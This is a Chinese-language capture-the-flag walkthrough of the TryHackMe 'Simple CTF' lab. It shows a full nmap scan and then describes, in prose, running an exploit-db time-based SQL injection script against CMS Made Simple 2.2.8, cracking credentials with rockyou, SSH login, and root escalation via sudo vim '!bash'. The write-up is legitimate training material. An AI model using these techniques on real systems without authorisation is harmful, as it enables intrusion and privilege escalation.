[THM] Simple CTF

文章发布时间:

文章总字数:
962

[THM] Simple CTF

信息收集

拿到IP之后先nmap扫描一下以及服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
nmap -sV -sC -v 10.49.128.162          
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-02 03:31 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating Ping Scan at 03:31
Scanning 10.49.128.162 [4 ports]
Completed Ping Scan at 03:31, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:31
Completed Parallel DNS resolution of 1 host. at 03:31, 0.02s elapsed
Initiating SYN Stealth Scan at 03:31
Scanning 10.49.128.162 [1000 ports]
Discovered open port 80/tcp on 10.49.128.162
Discovered open port 21/tcp on 10.49.128.162
Discovered open port 2222/tcp on 10.49.128.162
Completed SYN Stealth Scan at 03:32, 9.98s elapsed (1000 total ports)
Initiating Service scan at 03:32
Scanning 3 services on 10.49.128.162
Completed Service scan at 03:32, 6.38s elapsed (3 services on 1 host)
NSE: Script scanning 10.49.128.162.
Initiating NSE at 03:32
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:32, 30.80s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 1.04s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Nmap scan report for 10.49.128.162
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.190.111
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.89 seconds
           Raw packets sent: 2007 (88.260KB) | Rcvd: 10 (412B)

就开放了三个端口,http服务,ssh,ftp,基本前两个问题就解决了

然后是找到一个争对应用的cve,我这里显示搜索的apache,ssh,vsftpd上面版本的漏洞,不过没有找到特别符合的漏洞,然后想着估计还是http服务那边还有进一步的利用

直接dirsearch爆破一下目录,找到了一个/simple目录,直接拉到最下面看到版本是2.2.8那么估计就是这个cms的漏洞了

exploit-db上搜索,确实找到一个版本接近,能利用的漏洞,是一个基于时间sql注入(sqli),可以拿到用户名以及密码

下载这个python脚本,运行,需要指定-u-w rockyou.txt两个参数,我这里使用的是rockyou字典,很容易就拿到了密码

权限提升

之后可以利用这个进入cms的后台管理,然后又是在后台迷糊了一会,才想起来还有一个ssh服务可以利用

这里要注意ssh服务端口在2222,又手动指定的,不然又是浪费了一会时间,才察觉

然后在用户目录,下直接就可以cat user.txt

然后ls /home,就可以找到另一个用户sunbath

最后提权的话,我上传了一个LinEnum的提权辅助脚本,运行之后,一下子可以找到这个利用点是sudo的vim

类似于vi的利用,sudo vim然后esc输入!bash就可以拿到root权限的shell了

之后在/root目录下拿到root的flag